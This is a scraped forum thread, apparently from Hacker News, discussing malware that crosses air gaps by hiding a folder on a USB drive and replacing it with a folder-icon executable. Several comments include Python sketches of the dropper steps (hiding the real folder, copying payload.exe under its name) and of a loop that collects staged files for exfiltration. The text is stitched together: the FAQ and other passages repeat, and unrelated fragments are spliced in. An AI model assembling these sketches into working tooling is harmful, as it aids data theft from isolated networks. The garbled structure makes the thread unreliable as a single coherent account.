This was more like a controlled environment, but everyone knows that USB/WiFi is a steaming shitpile, with its own firmware and other shit.
It's unclear to me why you believe this is relevant here. This attack indeed uses different tooling, and a completely different attack vector (social engineering via the presentation of a malicious executable in the GUI, as opposed to an auto-run exploit).
A lot of people ITT don't seem to understand very well what's going on with this attack. The Ars Technica article doesn't seem very well written, but we've had previous discussion[0].
Quick FAQ:
> Haven't we known about USB vulnerabilities forever (agent.btz, BadUSB etc.)?
The fact that USB devices were used to transfer the files is irrelevant to the attack.
The attack doesn't depend on running the malware directly off the USB device, on any kind of auto-run vulnerability, etc. It would have worked out the same way if files had been transferred, for example, by burning them to DVD. The attack only depends on the machines on the non-air-gapped side being compromised, such that the attackers can control what is put onto the USB. But the USB drives themselves are only being used as dumb storage here.
The attack instead primarily depends on social engineering that is helped along by the design of the Windows GUI. On the air-gapped machine, the user sees a "folder" which is actually an executable file. By default, Windows hides the .exe file extension (which it uses to determine executability of the file) in the GUI; and the icon can be customized. Double-clicking thus launches the malware installer when it was only supposed to open a folder. The folder has a name that the user expected to see (modulo the hidden extension).
It appears that the original setup involves hiding[1] (but still copying) the folder that was supposed to be transferred, and then renaming the malware to match. (Presumably, the malware could then arrange for Windows to open the hidden folder "normally", as part of its operation.) Windows can be configured to show "hidden" files (like `ls -a`), but it isn't the default.
Notice that this is social engineering applied only to the process of attempting to view the files - nobody was persuaded to use any storage devices "from outside".
> Isn't that, like, not actually air gapped?
The definition of an air gap generally allows for files to be passed across the air gap. Which is all the attack really depends on. See also "sneakernet". The point is that you can easily monitor and control all the transfers. But this attack is possible in spite of that control, because of the social engineering.
> How is it possible to exfiltrate data this way?
The actual mechanism isn't clearly described in media coverage so far, from what I can tell. But presumably, once malware is set up on the air-gapped machine, it copies the files back onto the USB, hiding them. When the device is transferred back to the non-air-gapped side, malware already present there monitors for the USB being plugged in, retrieves the files and uploads them (via the "GoldenMailer" or "GoldenDrive" components) elsewhere.
[1]: Windows file systems generally don't have an "executable bit" for files, but do have a "hidden bit", rather than relying on a leading-dot filename convention. So it's the opposite of what Linux does.
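The "hidden bit" in that footnote is an ordinary Win32 file attribute, so the worm-side step amounts to something like this sketch (ctypes, Windows-only, path illustrative):

```python
# Sketch: set the HIDDEN attribute on a directory, as the malware
# reportedly does to the real folder before dropping its look-alike .exe.
import ctypes

FILE_ATTRIBUTE_HIDDEN = 0x2

def hide(path: str) -> None:
    if not ctypes.windll.kernel32.SetFileAttributesW(path, FILE_ATTRIBUTE_HIDDEN):
        raise ctypes.WinError()

hide(r"E:\Documents")
```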
> Next, the infected computer infects any external drives that get inserted. When the infected drive is plugged into an air-gapped system, it collects and stores data of interest. Last, when the drive is inserted into the Internet-connected device, the data is transferred to an attacker-controlled server.
This implies the ability to turn a common USB drive into a vector for malware.
"BadUSB is a computer security attack using USB devices that are programmed with malicious software.[2] For example, USB flash drives can contain a programmable Intel 8051 microcontroller, which can be reprogrammed, turning a USB flash drive into a malicious device.[3] This attack works by programming the fake USB flash drive to emulate a keyboard. Once it is plugged into a computer, it is automatically recognized and allowed to interact with the computer. It can than then initiate a series of keystrokes which open a command window and issue commands to download malware. " -- https://en.wikipedia.org/wiki/BadUSB
There is basically no security-focused PC hardware, aside from maybe Raptor systems, which isn't really the same ilk.
Off the top of my head, a lot of these devices and hardware were honeypot traps set up by law enforcement.
I'd go out on a limb and say this isn't a problem anyone actually wants to solve.
All the technical "hacking" happened on the non-air-gapped side, so that that computer would put malware onto the USB with a deceptive presentation (an .exe with an icon to look like a folder and with the same name as an expected folder, while the actual folder was hidden). The rest is social engineering (and Windows not showing the .exe extension).
[1]: `pip3.exe` is an example; it's hard-coded to run the Pip module from `site-packages`, but `pip.py` could be replaced. More to the point, these wrappers are automatically created by Setuptools, to run an arbitrary script specified in the build process, from a "stub" included with Setuptools. (All of this is to work around the lack of support for shebangs, of course.) I don't know if Setuptools can or does sign these wrappers. Probably not.
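To illustrate the mechanism (a minimal sketch with made-up package and function names, nothing from the malware): a `console_scripts` entry point like this is all it takes for Setuptools to emit a `pip3.exe`-style wrapper on Windows:

    from setuptools import setup

    setup(
        name="example-tool",
        version="0.1",
        py_modules=["example_tool"],
        entry_points={
            "console_scripts": [
                # Produces example-tool.exe, a stub that imports
                # example_tool and calls its main() function.
                "example-tool = example_tool:main",
            ],
        },
    )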
I think that will greatly reduce the ability to get work done. It's my understanding that the workflow for using these specific airgapped computers involved moving USB thumb drives between computers.
Now you're making me wonder if keyboard firmware could be an attack vehicle.
Does anyone have more details on how this is done?
> It is probable that this unknown component finds the last modified directory on the USB drive, hides it, and renames itself with the name of this directory, which is done by JackalWorm. We also believe that the component uses a folder icon, to entice the user to run it when the USB drive is inserted in an air-gapped system, which again is done by JackalWorm.
[1] https://www.welivesecurity.com/en/eset-research/mind-air-gap...
THAT would probably ensure the user does not suspect anything nefarious has happened, even after the fact.
Now, how Windows Defender and other heuristics-based scanners would not treat the malicious EXE with a folder icon as a threat and quarantine it immediately -- I don't know.
The "malicious" exe, as I understood it, just boots up Python to run a script, where the actual malice lies. Windows Defender has to treat an executable that does only this as benign - because Python's packaging tools provide such executables (so that Windows users can get applications - including (upgrades to) Pip itself - from PyPI that "just work" in a world without shebangs and +x bits). For that matter, standard tools like Setuptools could well have been used as part of crafting the malware suite.
Presumably they could notice that an .exe has the normal folder icon. But presumably that icon could also be slightly modified in ways that would defeat heuristic recognition but still appear like a folder icon to a not-especially-attentive human.
>Does the malware EXE that now looks like a Folder icon with same name as the last modified actual folder (which is now hidden) ... also redirect the user to the actual folder and its contents in file Explorer after successfully delivering its malicious payload?
I didn't see anything about that in the description of the attack. But I assume that the Python script could accomplish this by just making an appropriate `subprocess.run` call to `explorer.exe`.
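Something like this would do it (a guess on my part; the path is hypothetical):

    import subprocess

    # Reopen the real (now-hidden) folder so the double-click appears to
    # have worked normally. Explorer will open a hidden folder if given
    # its explicit path.
    subprocess.run(["explorer.exe", r"E:\Reports"])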
Once you can manipulate the code in the firmware, it's probably pretty easy to find a kernel-level exploit.
Here is a reference involving a virus: https://superuser.com/questions/854918/manipulating-firmware...
Yeah, but that has to be a custom or specific kind of programmable USB device, or one that somehow unintentionally allows you to reflash its firmware to something else.
Also, if anyone ever plugs your malicious USB device into a Mac, they will get a pop-up from macOS asking them to identify the keyboard. Although maybe if it fakes a specific USB keyboard that macOS knows out of the box, you could avoid that?
>It is probable that this unknown component finds the last modified directory on the USB drive, hides it, and renames itself with the name of this directory, which is done by JackalWorm. We also believe that the component uses a folder icon, to entice the user to run it when the USB drive is inserted in an air-gapped system, which again is done by JackalWorm.
The problems here are to do with how Windows uses and presents file extensions.
OK, you may be overthinking this one
External buses and RF comms present massive attack surfaces that must be locked down with religious fervor: auditing, disabling, and management.
https://ec.europa.eu/commission/presscorner/detail/en/qanda_...
I always thought that the big switch was probably still a massive vulnerability - is it air-gapped or not? When the switch is flicked, it only takes milliseconds for an exploit to cross.
Anyway, not sure what happened to those guys in the end.
(This should also include sneakernet!)
Heck, every TV show has someone downloading the nuclear plans off Dr. Evil's laptop by... plugging in a USB device while he's distracted by spilling his coffee.
In my experience it doesn’t stop admins connecting an “offline Root CA” to the WiFi network to install their entire suite of server management software — none of which are functional without an active network connection.
Yes, my plan was to physically remove the wifi adapter daughter card. They exposed the CA to gigabytes of third-party software before I turned up to do the setup. Yes, I warned them not to even take the computer out of the box.
Offline anything just breaks people’s brains.
“How do we keep the anti-virus pattern file up to date?”
“You don’t.”
Protection was BitLocker drive encryption with a manually entered (long!) passphrase to decrypt. Backups were to encrypted USB media never plugged into anything else other than a redundant clone of the CA used for DR testing. Everything went into safes.
This design works Well Enough for all but the most demanding purposes, but the whole rigmarole was undone by a well-meaning but naive admin “just doing his job”.
Fibre for networking, PS/2 (with or without adapters) for keyboards and mice, and VGA for monitors.
as an example of what it's still like in some of those spaces, here's a product sheet for a cross-domain chat solution - the screenshot on the second page appears to be CDE. https://owlcyberdefense.com/wp-content/uploads/2020/12/20-OW...
[0] https://github.com/reactjs/react.dev/issues/3896
Namely that (good) library authors will do everything possible to avoid breaking the public API, which can be seen as a “promise” from them in what can be relied upon, while internal/private members offer no such promises and the library author can feel free to change/remove them as desired with no prior notice.
This was more like a controlled environment, but everyone knows that USB/Wi-Fi is a steaming shitpile, with its own firmware and other shit.
Quick FAQ:
> Haven't we known about USB vulnerabilities forever (agent.btz, BadUSB etc.)?
The fact that USB devices were used to transfer the files is irrelevant to the attack.
The attack doesn't depend on running the malware directly off the USB device, on any kind of auto-run vulnerability, etc. It would have worked out the same way if the files had been transferred, for example, by burning them to DVD. The attack only depends on the machines on the non-air-gapped side being compromised such that the attackers can control what is put onto the USB. But the USB drives themselves are only being used as dumb storage here.
The attack instead primarily depends on social engineering that is helped along by the design of the Windows GUI. On the air-gapped machine, the user sees a "folder" which is actually an executable file. By default, Windows hides the .exe file extension (which it uses to determine executability of the file) in the GUI; and the icon can be customized. Double-clicking thus launches the malware installer when it was only supposed to open a folder. The folder has a name that the user expected to see (modulo the hidden extension).
It appears that the original setup involves hiding[1] (but still copying) the folder that was supposed to be transferred, and then renaming the malware to match. (Presumably, the malware could then arrange for Windows to open the hidden folder "normally", as part of its operation.) Windows can be configured to show "hidden" files (like `ls -a`), but it isn't the default.
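Putting those pieces together, the USB-side trick might look something like this - my sketch of the described behavior, not GoldenJackal's code; the drive letter and payload name are invented:

    import ctypes
    import shutil
    from pathlib import Path

    FILE_ATTRIBUTE_HIDDEN = 0x02
    drive = Path("E:/")

    # Find the most recently modified directory on the drive.
    target = max(
        (d for d in drive.iterdir() if d.is_dir()),
        key=lambda d: d.stat().st_mtime,
    )

    # Set the Windows "hidden" attribute on the real folder.
    ctypes.windll.kernel32.SetFileAttributesW(str(target), FILE_ATTRIBUTE_HIDDEN)

    # Drop the launcher next to it, named after the folder plus a ".exe"
    # that Explorer hides by default; its resources would carry a folder icon.
    shutil.copyfile("payload.exe", drive / (target.name + ".exe"))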
Notice that this is social engineering applied only to the process of attempting to view the files - nobody was persuaded to use any storage devices "from outside".
> Isn't that, like, not actually air gapped?
The definition of an air gap generally allows for files to be passed across the air gap. Which is all the attack really depends on. See also "sneakernet". The point is that you can easily monitor and control all the transfers. But this attack is possible in spite of that control, because of the social engineering.
> How is it possible to exfiltrate data this way?
The actual mechanism isn't clearly described in media coverage so far, from what I can tell. But presumably, once malware is set up on the air-gapped machine, it copies the files back onto the USB, hiding them. When the device is transferred back to the non-air-gapped side, malware already present there monitors for the USB being plugged in, retrieves the files and uploads them (via the "GoldenMailer" or "GoldenDrive" components) elsewhere.
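In other words, the non-air-gapped side would only need a loop of roughly this shape (again a guess; the staging directory name and drive letters are invented, and the upload function stands in for the GoldenMailer/GoldenDrive step):

    import time
    from pathlib import Path

    STAGING = ".stage"  # hypothetical hidden dead-drop directory on the USB

    def wait_for_stage() -> Path:
        # Poll for a removable drive carrying the staging directory.
        while True:
            for letter in "DEFGHIJ":
                stage = Path(f"{letter}:/") / STAGING
                if stage.is_dir():
                    return stage
            time.sleep(5)

    def exfiltrate(path: Path) -> None:
        # Stand-in for the email/cloud upload step.
        print("would upload", path)

    for f in wait_for_stage().rglob("*"):
        if f.is_file():
            exfiltrate(f)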
[0] https://www.welivesecurity.com/en/eset-research/mind-air-gap..., via https://news.ycombinator.com/item?id=41779952.
[1]: Windows file systems generally don't have an "executable bit" for files, but do have a "hidden bit", rather than relying on a leading-dot filename convention. So it's the opposite of what Linux does.
> Next, the infected computer infects any external drives that get inserted. When the infected drive is plugged into an air-gapped system, it collects and stores data of interest. Last, when the drive is inserted into the Internet-connected device, the data is transferred to an attacker-controlled server.
This implies the ability to turn a common USB drive into a vector for malware.